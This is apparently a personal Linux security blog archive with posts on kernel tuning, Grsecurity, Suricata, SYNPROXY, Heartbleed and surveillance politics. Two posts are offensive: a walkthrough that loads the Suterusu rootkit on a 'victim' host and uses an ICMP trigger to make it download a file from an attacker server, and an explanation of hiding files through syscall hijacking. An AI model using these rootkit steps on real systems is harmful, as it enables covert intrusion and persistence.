Tuesday, March 17, 2015

HIGHRES TIMER can be your DoS nightmare

This is a real-life story about HIGH RESOLUTION TIMER and how lame
coders use it to make a self-DoS;-) You should be very cautions if
your system was written by those type of coders.

Incident happened:

1, A dozen of RHEL 6 GNU/Linux servers were extremely slow while
running some *** applications. The kernel CPU usage was about
40%--50%.

2, the "free" item from vmstat was not seems OK. "free" was keep
increasing but "buff" & "cache" were decreasing when a bunch of data
went through. Then kernel gave you a *hint* about OOM( Out of Memory):

"kernel panic - not syncing: Out of memory and no killable processes..."

Then kernel tried to kill each processes until shit happened, which
was kernel panic.

I began this investigation with strace. The result was quite
strange. Why would the application( malware?) invoke the syscall
nanosleep() so often? Every 10000ns( 10us)? Seriously? All I can tell
is the application doesn't need to do real time work.

--------------------------------------------------------------
15:30:08.002047 nanosleep({0, 10000}, NULL) = 0 <0 .000082="">
15:30:08.002175 nanosleep({0, 10000}, NULL) = 0 <0 .000074="">
15:30:08.002297 nanosleep({0, 10000}, NULL) = 0 <0 .000074="">
...
15:30:09.917557 nanosleep({0, 10000}, NULL) = 0 <0 .000075="">
15:30:09.917661 nanosleep({0, 10000}, NULL) = 0 <0 .000071="">
--------------------------------------------------------------

The customer said it was never happened in 0ld good GNU/Linux systems(
like RHEL 5). My guts hints me to a direction: High Resolution
Timer. A type of kernel timer that can provide more accurate time
measure. I've read Linux Manual and very well explained kernel doc and 
learned that HIGHRES TIMER was added to the upstream code in
2.6.21. So I guess..just guess..some lazy & lame coders just want to
make the program "sleep" in a very "short" time. Then he/she wrote
this code very confidently:

usleep(10);

If you're running linux kernel before 2.6.21, this line of code will
only sleep between 1ms and 2ms. But..annoying *but* is coming..if
you're running *modern* GNU/Linux distro with HIGHRES support, the
same code will sleep 10us, which might cause performance hit. CentOS
community had the similar issue before:



From the evidence we have, there are two clues might lead us to the
crime-scene: High Resolution Timer.

1, nanosleep() has been invoked >=8k times in every fuc*ing second.

2, The victim kernel was not running with kdump. But we still have
some kernel logs. According to the CallTrace, the kernel was playing
with HIGHRES-related context should not be a coincidence:

 [] ? audit_syscall_exit+0x27e/0x290
 [] ? sysret_audit+0x16/0x20
 [] ? __hrtimer_start_range_ns+0x1a3/0x460
 [] ? sysret_audit+0x16/0x20
 [] ? sysret_audit+0x16/0x20
 [] ? audit_filter_rules+0x2d/0xa10
 [] ? audit_syscall_exit+0x27e/0x290
 [] ? sysret_audit+0x16/0x20
schedule_timeout: wrong timeout value ffffffffffffb572


Solution:

I'm giving you two options:

1, Modify the source code( if you have) about *sleep*-related
functions and tell the fuc*ing coders they can go home and fuck
themselves.

2, Append "nohz=off highres=off" to the file /etc/grub.conf, to turn
it fuc*ing off this feature.


Testing result:

Unfortunately, we had to test this in a production system..but we did
it.

+-----------------------------------------------+
| Item      | HIGHRES ON          | HIGHRES OFF |
+-----------------------------------------------+
| nanosleep |   >8,000 times      | 345 times   |
+-----------------------------------------------+
| buff/cache| Decreasing          | Increasing  |
+-----------------------------------------------+
| %sys      | 50%                 | 6%          |
+-----------------------------------------------+

Well, I guess we arrested the *perpetrator* this time. Damn...not every 
business impact caused by security issues;-)

Saturday, January 03, 2015

Happy New Year 2015

Time is running on and brings us to another new year. Does this fuc*ing mean another fight? I've been sitting on my butt and watching a lot of presentations of 31C3. Unfortunately, I couldn't be there physically. I'm fuc*ing jealous you guys who were there;-)

I've learned a lot from these videos. So, I'd like to write down what I thought about some great topics.

31C3 Opening Event [31c3] mit Erdgeist und Geraldine de Bastion
Nothing I can say about opening;-)


Jacob Appelbaum: Reconstructing narratives - transparency in the service of justice

This is the most fuc*ing awesome presentation I've seen in 2014 since I watched Jacob's free speech on last C3 conference. Yes..what I've been trying to tell people( friends & customers) that only a few things we may rely on: OTR, PGP, SSL/TLS with PFS... This is a very positive message that not everything is being fucked. Well... IMOHO, only taking crypto itself into account is not enough.  Kernel hardening should be a must-need stuff more than ever before. A lot of 0ld sch00l guys are complaining about people are still not taking serious about system-lvl security( PaX/Grsecurity? QubeOS? Mirage OS?) after EFF released the security guideline. Even the Information Security for Journalists focuses on crypto in the most part......damn...I think there are  a lot of interesting stuff we could try in 2015.............

SS7map : mapping vulnerability of the international mobile roaming infrastructure [31c3]

Well done, P1Sec guys! Telco security is not my major focus, but I've been learning CORENET stuff from some friends in last a few years. According to the ss7map, China is one of country has high risk in CORENET. Guess a huge consulting market is out there;-)


The Cloud Conspiracy 2008-2014 [31c3]


Everybody are talking about the cloud. Cloud might help small startup( don't have sensitive data) in many aspects, especially on cost issue. But..speak of cloud security, damn..I'm gonna speak it out: The security of public cloud is a joke, the security of private cloud is a fraud;-)

Trustworthy secure modular operating system engineering

Building trust-chains within compartment/containment is not a bad idea for defense in depth. "What you're doing is wrong" is a common phrase from hacker community. But how to do it right is a scientific problem;-) I don't think typed-safe language will be a silver-bullet. New issues and snake-oil security product always comes out. People will be happy to talk about how "Next-Gen" technology gonna change the future...unfortunately, they have no idea what the fuc* they talk about( in most cases). Why would the fuc*ing industry needs "Next-Gen" technology? I guess, no one wants talk about what the hell was the Last-Gen tech;-)

SS7: Locate. Track. Manipulate.

Wow..very good work, Tobias! I was so exciting when you show up the demo. CORENET is really interesting and amazing. That reminds me a saying from Captain: "The phone company is nothing but a computer... A computer is a System...". Ohh, did I say "cloud"?



Switches Get Stitches - Industrial System Ownership




People are taking serious about ICS security after the disclosure of Stuxnet. In the meantime, snake-oil products/services just come out of nowhere. This talk is awesome. It's almost like ICS security 101 to me. Thanks Eireann, I think I owe you a beer;-)

Reproducible Builds - Moving Beyond Single Points of Failure for Software Distribution

I love EFF and being proud as a member. EFF has been doing a great job about public education and fighting for individual's privacy. I'm not sure if we could win or not. But this is the right thing to do. Reveal the dark-side of cybersecurity is inevitable. We had to deal with shit like Mr.Dullien mentioned in Offensive work and addiction. Do we ever had a chance to live in a *purely* world without "I hunt sysadmin"? If we don't, reproducible builds is very valuable for us to against mass surveillance. Gitian is a project, which Seth & Mike mentioned about.

 Reproducible builds can't solve all potential threats. But it can help us in some levels to identify "There is a backdoor in the indentical binary or there isn't a backdoor". You might also want to read about Trusting trust issue.

By the way, another reason I love Debian is because Mempo project;-) We need your hands..fuck off, NSA!

Freedom in your computer and in the net(click me)


Fascinating free speech from RMS! My wife believes that to be idealistic is to be realistic...are we talking about leap of faith? Sometimes, faith is all we left;-) RMS is one of the most respectful man. His philosophy inspired me to started using GNU/Linux. Phrack inspired me to be a cybersec dude....



RMS talked about a few important things in 31C3:
1, The differences between Free software and open source. Free Software is more concern about ethical libre, while open source only emphasize  the practical stuff like code quality or cost issue.

2, Security aspect. Free Software is more secure than closed software. Microsoft send NSA the information of Windows bug before they fix, maybe other vendors( closed-source product) would do the same things.

3, RMS thinks all university should teach reverse engineering. It's a good choice when you had to explore something in a closed-source world.

4, RMS siad "...also the software they teach student to use must be free, because the school has social mission to educate good citizens of society that is strong, capable, independent, cooperating and free..". Damn..I was touched. I've been asking myself a question for a long time: Why would I support FSF and EFF in the 1st place? Probably I can say now, that is: It's worth. Making the public can get benefit from it and educate the public about free software and digital privacy are so important in the information age.

btw: Hope I can make it to 31C3.

May the L0rd's hacking spirit guides us in 2015!

Sunday, August 10, 2014

An awesome linux kernel rootkit: Suterusu


I've been fuc*ing busy since I left SuSE about two months ago. I have a lot of time to hack/learn anything I want. Well, rootkit is one of my TODO things, as always. I wrote a dumb rootkit a half year ago. It's using an old good method to hiding file: hijack some syscalls. There's a better solution called "inline hook". Suterusu is the one implemented a inline hook framework. I don't want to explain the detail of how Suterusu was implemented. Cuz' no one( in the most cases) would do the job better than the original author: Michael Coppola already wrote a good article "Suterusu Rootkit: Inline Kernel Function Hooking on x86 and ARM".

I always want to make some open source rootkits work on the latest version of GNU/Linux. Damn...I'd be exhausted if I really do that. There are bunch of rootkits( adore-ng, ddrk, kbeast-v1, wnps, etc) out there and out-of-dated for years. Although you might find some "modern" ones like maK_it, kernel-rootkit-2.6.32, etc...but..there's always a annoying "but"...these rootkits are either lacking of inline hook framework or can't support a diverse linux kernel versions. I've test Suru on a dozen of different linux kernels, from 2.6.35 to 3.13.1. Now I'm going to share two stories of mine( of course, it's Sur-related;-)):

1, A friend asked for advice about rootkit selection, of course I'd never hesitate to tell him to use Suru. When he tried to use it, he found out he couldn't compile it on kernel-3.14.1. Then I modified a few lines of code and then it works.

2, Another friend( a pentester) asked me if I can make any rootkit work on CentOS 6.5 with 2.6.32-431.el6 x86_64. I tried Suru and found out it was not support 2.6.32 yet. Then I've add less than 100 LOC and then it works.

Suru is an awesome rootkit. I'm sure a lot of people are using it. Today I found out two features of Suru called "ICMP" and "DLEXEC" that I never look into it. A friend( still that pentester) told me it can be used as a covert channel to transfer files. I write a triggering program that could craft a specific ICMP header/payload and send it to the "victim server". When the victim receives the packet, it will download a file from a specific server.

---------------------------------------------------------------------
1. Download the Suterusu for both "victim" and "attacker".

2. The victim is using CentOS 6.5:
root@centos-rktesting ~]# uname -r
2.6.32-431.el6.x86_64


2.1 Install some necessary packages:
yum install -y kernel-devel.x86_64 gcc vim

2.2 Compile & load the rootkit:
[root@centos-rktesting suterusu]# make linux-x86_64 KDIR=/usr/src/kernels/2.6.32-431.23.3.el6.x86_64/ ICMP=y DLEXEC=y
make ARCH=x86_64 EXTRA_CFLAGS="-D_CONFIG_X86_64_ -D_CONFIG_DLEXEC_ -D_CONFIG_ICMP_" -C /usr/src/kernels/2.6.32-431.23.3.el6.x86_64/ M=/root/suterusu modules
make[1]: Entering directory `/usr/src/kernels/2.6.32-431.23.3.el6.x86_64'
  CC [M]  /root/suterusu/main.o
  CC [M]  /root/suterusu/util.o
  CC [M]  /root/suterusu/module.o
  CC [M]  /root/suterusu/dlexec.o
  CC [M]  /root/suterusu/icmp.o
  LD [M]  /root/suterusu/suterusu.o
  Building modules, stage 2.
  MODPOST 1 modules
  CC      /root/suterusu/suterusu.mod.o
  LD [M]  /root/suterusu/suterusu.ko.unsigned
  NO SIGN [M] /root/suterusu/suterusu.ko
make[1]: Leaving directory `/usr/src/kernels/2.6.32-431.23.3.el6.x86_64'

[root@centos-rktesting suterusu]# insmod suterusu.ko
 

3. The attacker can use anything GNU/Linux distro as you want, compile the file server and designate the file you want it to be transferred:
shawn@shawn-fortress /tmp/suterusu $ sudo ./a.out 8556 README.md
Bound to port 8556, waiting for connection...


3.1 Open a new terminal:
shawn@shawn-fortress /tmp/suterusu $ cd test/
shawn@shawn-fortress /tmp/suterusu/test $ ls
trigger_icmp_covert.py
shawn@shawn-fortress /tmp/suterusu/test $ ./trigger_icmp_covert.py


 4. Go to the victim's machine, check:
[root@centos-rktesting ~]# cat /root/.tmp
Suterusu
========

Typical compilation steps:

...........................................................
.................................................................

---------------------------------------------------------------------

That's it! Show time is over! It's quite simple, ah? I really appreciate Michael Coppola released Suterusu under free/open source software license. And I also thank him brings us good writings;-)

btw: What next? I probably go to try some memory forensics, to see if I could hunt some rootkits;-)

Have fun & good hunting!!!

May the L0rd's hacking spirit guide us!!!

Further readings:
[1] RFC-792
http://tools.ietf.org/html/rfc792

[2] Python documentation:
https://docs.python.org/2/library/struct.html

[3] TCP/IP protocols
http://www.protocols.com/pbook/tcpip3.htm

[4] Sock-RAW
http://sock-raw.org/papers/sock_raw

Wednesday, May 14, 2014

Simple Grsecurity RBAC policy with kernel 3.14.1 on Debian 7.4

Speaking of kernel hardening, I personally like Apparmor and sick of SELinux( you know why). pi3's paper on Phrack Issue 67 was the 1st place I've met Grsecurity/Pax. I never forget that 30-sec would help the people to build the defense in depth;-) Then I went to read some Phrack papers from old good hacking days that I missed. Then I know they are the original authors of ASLR...and much more. No doubt that Grsecurity/Pax is one of the most respected old school communities......Note: Grsecurity/Pax don't use LSM since LSM breaks the principle of build-security-in, which should treat the security as whole. I think it's time to explore....

Download kernel:
https://www.kernel.org/pub/linux/kernel/v3.x/linux-3.14.1.tar.xz

Download grsecurity patch:
https://www.grsecurity.net/test/grsecurity-3.0-3.14.3-201405121814.patch

Patch the kernel with grsecurity:
xz -d linux-3.14.1.tar.xz
tar xvf linux-3.14.1.tar
cd linux-3.14.1/
patch -p1 < ../grsecurity-3.0-3.14.3-201405121814.patch

You can use my kernel config:
https://raw.githubusercontent.com/citypw/citypw-SCFE/master/security/apparmor_test/debian-7.4-linux-3.14.1-grsec.config

Or make your own config via "make menuconfig". Then compile the kernel:
make -j3 deb-pkg

It will help you build deb packages. All you need to do is install them:
dpkg -i ../*.deb

Now, the kernel part is done. Download gradm( RBAC administrator utility):
https://www.grsecurity.net/stable/gradm-3.0-201401291757.tar.gz

tar zxvf gradm-3.0-201401291757.tar.gz
cd gradm/
make && make install

Reboot the machine:
shutdown -r now

Now, you need to set a bunch of annoying passwords:
root@d6-test:/etc/grsec# gradm -P
Setting up grsecurity RBAC password
Password:
Re-enter Password:
Password written to /etc/grsec/pw.
root@d6-test:/etc/grsec#
root@d6-test:/etc/grsec# gradm -P admin
Setting up password for role admin
Password:
Re-enter Password:
Password written to /etc/grsec/pw.
root@d6-test:/etc/grsec#
root@d6-test:/etc/grsec# gradm -P shutdown
Setting up password for role shutdown
Password:
Re-enter Password:
Password written to /etc/grsec/pw.

Add this:
https://raw.githubusercontent.com/citypw/citypw-SCFE/master/security/apparmor_test/grsec_conf.a.out

into the tail of /etc/grsec/policy

What I did in the above policy was I created role shawn as a user, with some default polices, like /bin is executable only, etc. Then I set a binary /home/shawn/grsec_test/a.out has read permission on /home/shawn/hello and write permission on /home/shawn/world and run another shell is not allowed.  You can use my code to test the policy:

https://raw.githubusercontent.com/citypw/citypw-SCFE/master/security/apparmor_test/apparmor_test.c

btw: I tested the poc of CVE-2014-0196 on kernel-3.13 and it crashed the kernel. I tested it on kernel-3.14.1 with Grsecurity and it doesn't work. But this issue should be affected on 3.14.1...ah, I think Grsecurity works in some "mysterious" ways to prevent this poc. I'll dig deeper about this amazing hardening implementation.

Further readings:
[1] Grsecurity wiki
http://en.wikibooks.org/wiki/Grsecurity

[2] Documentation for the PaX project
https://pax.grsecurity.net/docs/

[3] Grsecurity Blog
https://forums.grsecurity.net/viewforum.php?f=7

Wednesday, April 16, 2014

Audit: don't only focus on heartbleed issue

I received the info about heartbleed issue on Apr 8 andI found out SLES-11 are using OpenSSL 0.9.8 branch code, which is not vulnerable to heartbleed issue. Then I patched it for OpenSuSE 13.1/12.3. It was easy because the patch was already there.

After an exciting and crazy week. People are getting calm and plan or already start to doing audit on their system. But there are something you might miss. The older version of OpenSSL( like 0.9.8) might not affected by heartbleed issue but it doesn't mean you are secure. Don't forget the old OpenSSL are still vulnerable to BEAST( 2011), CRIME( 2012), Lucky-thirteen( 2013). I do believe Lucky-thirteen is far more dangerous than heartbleed, we just don't know. Once you start the audit, plz upgrade the OpenSSL to the latest version. If you are using 0.9.8, plz upgrade to 0.9.8y, which is not vulnerable to Lucky-13 issue.

Fix heartbleed issue for website is much easier than the networking devices( Firewall, UTM, SSL/IPSEC VPN, etc) and the 3rd-party software. This definitely gonna impacting for long term.

I'd like to share some materials( you might already known).

Heartbleed issue technical analysis:
https://www.getpantheon.com/heartbleed-fix
http://blog.ioactive.com/2014/04/bleeding-hearts.html
http://blog.cryptographyengineering.com/2014/04/attack-of-week-openssl-heartbleed.html
http://blog.ioactive.com/2014/04/bleeding-hearts.html


I totally agree with the last point from this article:
http://blog.cryptographyengineering.com/2014/04/attack-of-week-openssl-heartbleed.html

To these major companies are highly reply on the open source TLS implementation( OpenSSL, GnuTLS, etc) should give them funding, to make them more secure and stable.

EFF is always right about how to aginst massive surveillance by agencies
like NSA. PFS is so fuc*ing important especially today. I think we should use TLS 1.2.

https://www.eff.org/deeplinks/2014/04/wild-heart-were-intelligence-agencies-using-heartbleed-november-2013
https://www.eff.org/deeplinks/2014/04/why-web-needs-perfect-forward-secrecy
https://www.eff.org/deeplinks/2013/08/pushing-perfect-forward-secrecy-important-web-privacy-protection
https://www.eff.org/deeplinks/2011/11/long-term-privacy-forward-secrecy

Performance hit probably is one of reasons that PFS is so important but the fact is only afew websites using it:
http://nmav.gnutls.org/2011/12/price-to-pay-for-perfect-forward.html

Test top-1m websites:
https://github.com/musalbas/heartbleed-masstest

C:
https://github.com/robertdavidgraham/heartleech

Client PoC:
https://github.com/Lekensteyn/pacemaker

---------------------------------------------------------
One more thing, to those who are still complaining about the security of free/open source software is worse than closed software. Well, I don't want to argue here. But, I'm giving you type of people 3 options:
1, Join the community, help the FOSS community to do code audit.
2, Make some donations to the organizations who really cares about your privacy and do the code audit for us. Like EFF, I'm fuc*ing pround of I'm member of EFF.....
3, G O   H O M E   A N D   F U C K   Y O U R S E L F   ! ! !

Monday, March 31, 2014

Suricata's file extraction on Debian GNU/Linux

Suricata is a high performance open source IDS/IPS project. I used it a long time ago around 2010 when it was released. I've been playing with Snort recently and then found Suricata has a great feature: File extraction. It'd be helpful to those who want to get malware samples from IDS. Anyway, like old days, I want to test it on my own and see how it works on Debian. First things first, I need to build it and see if it works.

Download a latest version of the small installation ISO image. I need to clarify my testing environment: Debian is running on my virtual machine, which has two NICs are eth0 and eth1. Interface eth0 is running on NAT mode and eth1 is running bridge mode.  Debian don't assign any IP addr to eth1.

Because our Debian is the small installation. So we have to install some dependency packages via simply apt-get:

#apt-get install vim openssh-server ethtool libpcap-dev libnfnetlink-dev libnetfilter-queue-dev libdnet-dev libdumbnet-dev libpcre3-dev libpcre3-dbg bison flex make zlib1g-dev autoconf libtool libnss3-dev libnspr4-dev libjansson4 libjansson-dev libyaml-dev libcap-ng0 libcap-ng-dev libnet1-dev libmagic-dev build-essential

Get the source code of Suricata:
#cd /tmp
#wget wget http://www.openinfosecfoundation.org/download/suricata-2.0.tar.gz
#tar zxvf suricata-2.0.tar.gz
#cd suricata-2.0

Compile and installation:
#./configure --enable-nfqueue --enable-gccprotect --prefix=/usr/local/suricata --localstatedir=/var
#make -j3
#make make-full

Edit suricata.yaml:
1, Set the request/response body a litte bigger:
           request-body-limit: 1gb #3072
           response-body-limit: 1gb #3072

2, Enable file extraction:
  - file-store:
      enabled: yes       # set to yes to enable
      log-dir: files    # directory to store the files
      force-magic: no   # force logging magic on all stored files
      force-md5: no     # force logging of md5 checksums
      waldo: file.waldo # waldo file to store the file_id across runs

  # output module to log files tracked in a easily parsable json format
  - file-log:
      enabled: yes
      filename: files-json.log
      append: yes
      #filetype: regular # 'regular', 'unix_stream' or 'unix_dgram'

3, Add our "test" rule file( test.rules in this case) into the section "default-rule-path:", like:
default-rule-path: /usr/local/suricata/etc/suricata/rules
rule-files:
 - test.rules
 - botcc.rules

Create a rule file:
/usr/local/suricata/etc/suricata/rules/test.rules

Add one line into test.rules( to save any jpg files) :
alert http any any -> any any (msg:"FILESTORE jpg"; fileext:"jpg"; filestore; sid:6; rev:1;)

Enable the eth1:
#ifconfig eth1 up

According to the Suricata's wiki, we should turn off the TCP GSO:
ethtool -K eth1 tso off
ethtool -K eth1 gro off
ethtool -K eth1 lro off
ethtool -K eth1 gso off
ethtool -K eth1 rx off
ethtool -K eth1 tx off
ethtool -K eth1 sg off
ethtool -K eth1 rxvlan off
ethtool -K eth1 txvlan off
ethtool -N eth1 rx-flow-hash udp4 sdfn
ethtool -N eth1 rx-flow-hash udp6 sdfn
ethtool -n eth1 rx-flow-hash udp6
ethtool -n eth1 rx-flow-hash udp4
ethtool -C eth1 rx-usecs 1000
ethtool -C eth1 adaptive-rx off

Run the Suricata with this command:
/usr/local/suricata/bin/suricata -c /usr/local/suricata/etc/suricata//suricata.yaml -i eth1

Use your firefox/chrome on your host machine, and visit some website, like this.

You should see some girl pictures in /var/log/suricata/files  ;-)

btw: Thanks to Suricata community brings us this fuc*ing awesome IDS/IPS project. Special thanks to Peter Manev.

Wednesday, March 19, 2014

SYNPROXY: the great DoS mitigation solution

I don't expect to can see a perfect DoS solution in my lifetime;-) As we known, there are tons of commercial gateway-level boxes can mitigate the DoS attack in some ways. But I prefer the combination of x86+GNU/Linux, like the most old school guys. Why? My answer is simple: It's the fuc*ing cheapest solution we have. SYNPROXY is one of  new features of linux kernel 3.13. It's based on netfilter framework and connection tracking. If I understand correctly, SYPROXY should mark the initial SYN packet as UNTRACKED and redirecting them into iptables's action "SYNPROXY"( like ACCEPT, DROP, NF_QUEUE, etc). SYNPROXY would be acting like a network gateway device( router?) to performing the regular TCP x-way handshakes. The original packet will be passing into the dst when handshake process is finished. The contributor Jesper Dangaard Brouer gave us a free speech at DEVCON last month. According to his slide's test result, these numbers are really looking good. I did a little test with my colleague today.

Platform: Debian, SLES-12-beta2
Hardware: Laptop, Server, 100Mbps Switch
Tools: hping3, metasploit

root@d6-test:/home/shawn# iptables -t raw -A PREROUTING -i eth0 -p tcp --dport 8888 --syn -j NOTRACK
root@d6-test:/home/shawn# iptables -A INPUT -i eth0 -p tcp --dport 8888 -m state --state UNTRACKED,INVALID -j SYNPROXY --sack-perm --timestamp --mss 1480 --wscale 7 --ecn
echo 0 > /proc/sys/net/netfilter/nf_conntrack_tcp_loose

Result:
Without SYNPROXY: ksoftirq is around 8%-9%
With SYNPROXY: ksoftirq is less than 3%

btw: This result may not be very accurate. Anyway, SYNPROXY works.

Thursday, February 06, 2014

Simple linux rootkit on Debian with kernel 3.13

I've wasted a lot of time in 2013. I've always find some shity execuses, like "I'm fucking busy recently" to delay my hacking journey of kernel rootkit. This was supposed to be done a couple of months ago. Thank L0rd! I found a slot during Chinese new year vacation at my hometown. I begun the adventure of rootkit hacking. I've read a bunch of great Phrack papers from the old good hacking days. It's old but it'd help.

---------------------------------------------------------------
[Weakening the Linux Kernel, Phrack Magazine Volume 8, Issue 52
January 26, 1998, article 18 of 20]
http://www.phrack.org/issues.html?issue=52&id=18&mode=txt

[Advances in Kernel Hacking, Volume 0x0b, Issue 58, Phile #0x06 of
0x0e]
http://www.phrack.org/issues.html?issue=58&id=6&mode=txt

[Handling Interrupt Descriptor Table for fun and profit, Volume 0x0b,
Issue 59, Phile #0x04 of 0x12]
http://www.phrack.org/issues.html?issue=59&id=4&mode=txt

[Kernel Rootkit Experiences, Volume 0x0b, Issue 61, Phile 0x0e of
0x0f]
http://www.phrack.org/issues.html?issue=61&id=14&mode=txt

[Mistifying the debugger, Volume 0x0c, Issue 65, Phile #0x08 of
0x0f]
http://www.phrack.org/issues.html?issue=65&id=8&mode=txt

Especially thanks to THC's paper, which was released in 1999:
[Complete Linux Loadable Kernel Modules]
https://www.thc.org/papers/LKM_HACKING.html
---------------------------------------------------------------

I wrote a simple rootkit that can only hide a specific file. Just a
few old school steps could make its feature possible:

Firstly, we need to retrieve the system call table. But it's no longer
exported since 2.6. Fortunately, there's still a few system calls are
exported. sys_close() is one of them:
--------------------------------------
root@d6-test:/home/shawn# grep sys_close /boot/System.map-3.13.0
c10e0aa1 T sys_close
c140fdc4 R __ksymtab_sys_close
c141815c r __kcrctab_sys_close
c1420e33 r __kstrtab_sys_close
--------------------------------------

I used a brute force way to locate that system call. I learned it from
memset's blog:
https://memset.wordpress.com/2011/03/18/syscall-hijacking-dynamically-obtain-syscall-table-address-kernel-2-6-x-2/

Start mem addr would be 0xc0000000, then it would try it repeatly unti
it locate sys_close()'s addr.

Then, write protection bit in cr0 has to be shut down. WP bit is the
16th bit in cr0 register.

31  30  29  28          19  18  17  16  15         6  5  4  3  2  1  0
+----------------------------------------------------------------------+
|PG|CD |NW|-----------------|AM|---|WP|--------------|NE|ET|TS|EM|MP|PE|
+----------------------------------------------------------------------+

After we done above steps, we are able to hijack the system call we
want. Here I choose to hijack getdents64(). Why? Because all I wanna
do is hide a specific file from "ls". Let's see what "ls" would
usually do:
------------------------------------------
// begin.........
execve("/bin/ls", ["ls"], [/* 16 vars */]) = 0
brk(0)                                  = 0x8366000
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7791000
access("/etc/ld.so.preload", R_OK)      = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY)      = 3
fstat64(3, {st_mode=S_IFREG|0644, st_size=19346, ...}) = 0
.......................
.......................
.......................
// look, that's it
getdents64(3, /* 17 entries */, 32768)  = 544
getdents64(3, /* 0 entries */, 32768)   = 0
close(3)                                = 0
fstat64(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 2), ...}) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7790000
.......................
// then it would display them in the standard out(1)
write(1, "a.out  dirent.c  dirent.c~  insi"..., 107a.out  dirent.c  dirent.c~  insight-lab  libmnl  libnftables  linux-3.13  linux-3.13.tar  my_tmp  nftables
) = 107
.......................
------------------------------------------

The only struct from kernel we have to face is:
-------------------------------------------------------------------
           struct linux_dirent {
               unsigned long  d_ino;     /* Inode number */
               unsigned long  d_off;     /* Offset to next linux_dirent */
               unsigned short d_reclen;  /* Length of this linux_dirent */
               char           d_name[];  /* Filename (null-terminated) */
                                   /* length is actually (d_reclen - 2 -
                                      offsetof(struct linux_dirent, d_name) */
               /*
               char           pad;       // Zero padding byte
               char           d_type;    // File type (only since Linux 2.6.4;
                                         // offset is (d_reclen - 1))
               */

           }
-------------------------------------------------------------------

d_reclen is size of the current linux_dirent64, it does matters. Plz
read the fucking source code for any detail! Well, like in good old days, I drew an ascii big picture here.

May the L0rd's hacking spirit guide us!!!

Wednesday, December 25, 2013

Life was never easy...especially in post-prism era;-)

I've watched a great free speech today:

Bruce Schneier, our great philosopher in cybersec field. And Eben Moglen, afaik, he is a great hacker( not in computer stuff) in free software law field. I do remember I used to listen Eben's free speech( electronic version) when I was in college. Seven years until now, I know better about why there are group of people has been trying fight for digital rights, software freedom, etc.....

I'm here to share something I've learn from Bruce and Eben today. This writeup is going to be my notes and some personal summary of 2013. It may be mess a little bit;-)

What do we learn from Mr Snowden's disclosure about crypto?
------------------------------------------------------------------
Cryptography itself is still hard to break. NSA is not breaking the math, but breaking by cheating, by stealing private keys, by forging certificates, by doing non-crypto stuff to archive their *ditry* goals. Even in the fucked-up case of Google, NSA didn't crack the traffic between user's browser and Google's server. Because Google uses client auth SSL at default, more importantly, it works( NSA dont like it). But NSA hijacked the traffic between Google data centers where the SSL/TLS was removed for whatever reasons( cost?). Crypto is still the one of the best ways to fight NSA or NSA-like organization.


Tor stories?
------------------------------------------------------------------
Personally, I like Tor. It probably could save people's life in some "restricted" area. Tor is pissed off agencies like NSA. The contributors of Tor project have routine seminars. It seems that the discussion of how to break Tor is their daily bread;-) Thanks to Tor project contributors.

What if NSA is in our threat model?
------------------------------------------------------------------
The 1st thing is mitigation: NSA got a piece of math but still need a bunch of engineers to make it work. Let NSA pay for higher cost( timing budget not new math). Plz use particular crypto technology( on GNU/Linux distro) as much as possible. It's reasonable to speculating that NSA has something about crypto stuff but we don't. Information asymmetry is indeed exsit. Of course NSA known what we do in past decades but we are rarely to known what NSA has been doing in the same period..so thanks to Mr Snowden's disclosure gave us *a little more* information.

And NSA-like organizations are definitely needs a lot of automated attack tools: foxasset? The reason it simple: you can't just train people on the street to become old school hackers in few months. That's why they have to develop automated tools.

btw: What does old school hacker mean in my context? A type of people who are highly skilled with low-level techniques, such as *NIX System, networking( both internet stuff and corenet of telco), reversing, cryptography, C/ASM code audit, etc..and also have a specific type of strong philosophy with underground spirit;-)....ug spirit~wth

Standard corruption?
------------------------------------------------------------------
It's not all standards does security matters. Bruce thinks AES is still secure. We can't only blame the Dual ECC stuff to standard process's fault. Implementation is important, such as non-NSA involved internation cellphone standard was fucked up..A1/5? Ring the bell? We should only trust these public standards, which our guys( free software enthusiast, cybersec philosophical anarchist like Phrack guys? or people like Bruce?:)) are getting involve with it.

What tools can we trust?
------------------------------------------------------------------
GNUPG, tor, OTR, etc... Some of these open source tools are written by security/crypto paranoids. They have a very awesome design and implementation.

What if you are on the target list of NSA-like organization?
------------------------------------------------------------------
If you are targeted, there's nothing you can do in that level. Is this a super-APT shit?

Is cyberwar going to be end?
------------------------------------------------------------------
I don't think so. If everyone holds the philosophy of "I'll fuck you if you don't fuck me first, sir", then it would turn the whole scene to be everybody being fucked by everybody. That's what old school hackers has been through the paradigm shift( painfully?) from old good hacking days to "This is cyber, sir!".

Is that sounds we are hopeless?
------------------------------------------------------------------
Nope, quoted from Bruce:"Society improves because people dare to think the unthinkable and then after 20, 30 years everyone says that was kind of good idea. It takes a while but it has to start."


FOSS solutions?
------------------------------------------------------------------
Bruce thinks open source solution is more secure than closed ones. Because:
1, You can look at it( source code)
2, It's harder to let someone slip into

We probably don't need to worry too much( did I say "too much"?) about NSA was/is/will try to put backdoor in some fundamental free software projects, like linux kernel, GCC, Glibc, "supposed to be re-written" openssl;-) etc. Because according to the full-disclosured documentations, NSA seems amazingly risks aversed. They only want to take a safe path. Yeah..yeah, I know what they're thinking...you can do evil, but don't be caught up;-) Free/open source community have a lot of old school hackers has been do code review for decades. They did a great job. And they are going to continue this *secret* war aginst NSA-like organization. So it's not easy attack( backdooring) on compiler.....( and, there are tons of guys like me are trying to be old school hackers).

Leap of faith?
------------------------------------------------------------------
Yeah, it sounds perfect. But no one can ensure you 100% secure. But the fact is that you can't examine everything. You must trust them( the tools you use). Give yourself a little faith. Did Soren A. Kierkegarrd said that we could feel comfortable to use GCC;-)

Well, use Apple products( iphone, ipad, ishit) and Microsoft products( Win for gaming platform, Office for whatever) are not a good options. Drop them, come on!

Hardware box issues: never update the full-disclosured vulns:
------------------------------------------------------------------
In some countries, cybersec business couldn't support small business. The reason cause that happened, because the most of customers had/have the wrong concept about cybersec. They think the only thing you need to do is
buy a bunch of hardware boxes( firewall, IDS/IPS, UTM, NGFW, or whatever). Obviously, it's violating the very important old school principles:
